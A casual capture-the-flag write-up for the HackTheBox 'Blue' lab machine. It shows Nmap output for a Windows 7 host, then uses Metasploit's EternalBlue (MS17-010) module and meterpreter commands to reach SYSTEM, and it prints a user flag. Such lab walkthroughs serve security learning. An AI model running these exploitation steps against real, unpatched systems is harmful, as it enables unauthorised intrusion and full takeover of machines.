A quick walkthrough of the "Blue" VM from HackTheBox
For this you'll need a Kali / Parrot Linux box, either as a normal machine, or as a VM, a VIP account at HackTheBox, VPN access set up and working knowledge of Metasploit Framework, and Nmap.
So, okay. You should have VPN access, and know what the IP addresses are for the VM and your workstation. The reason for this, is that the IP's will change everytime you access HTB, so check it, so you're sure what they are. But, with that said, let's jump to it.
If you remember the stages, recon, exploit recon, attack, and post / cleanup and note taking, let's get to it We kick off with nmap..
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 12:26 CEST
Nmap scan report for 10.129.128.137
Host is up (0.032s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: -19m55s, deviation: 34m37s, median: 3s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-10T11:27:55+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-10T10:27:56
|_ start_date: 2021-04-10T10:22:23
Note that the Nmap output will be more detailed than this, mine's shorted a bit for clarity. But, the one thing to take note of here, is these details.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
From that output, we know we have a Windows 7 Service Pack 1, with file and print running. So, can we find exploit code for this ? Try ask Google, and you will find ms17_010_eternalblue information.
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
https://www.exploit-db.com/exploits/42031
Note the top link, is pointing to something called "Rapid7" and modules ?. We might have a Metasploit Framework module for this, so let's be lazy and launch msfconsole.
msfconsolemsf6 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
So set the options, run the check function, and see if the system is patched for eternalblue. (It won't be), If everything worked, you should get a meterpreter shell back, (if that was your payload), and be in a meterpreter shell.
meterpreter > getprivs
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > So, we got a system account, we have taken the machine. Let's find some flags :)
meterpreter > search -f root.txt
Found 1 result...
c:\Users\Administrator\Desktop\root.txt (32 bytes)
meterpreter > search -f user.txt
Found 1 result...
c:\Users\haris\Desktop\user.txt (32 bytes)
meterpreter >
meterpreter > cat 'c:\Users\haris\Desktop\user.txt'
4c546aea7dbee75cbd71de245c8deea9So, we're done. And yep, I do know using Metasploit is the lazy way around. If you want the long way around, find and download the eternal_blue exploit source from somewhere, and try to do it manually, without using MSF.
So, happy hacking on the "Blue" VM ;)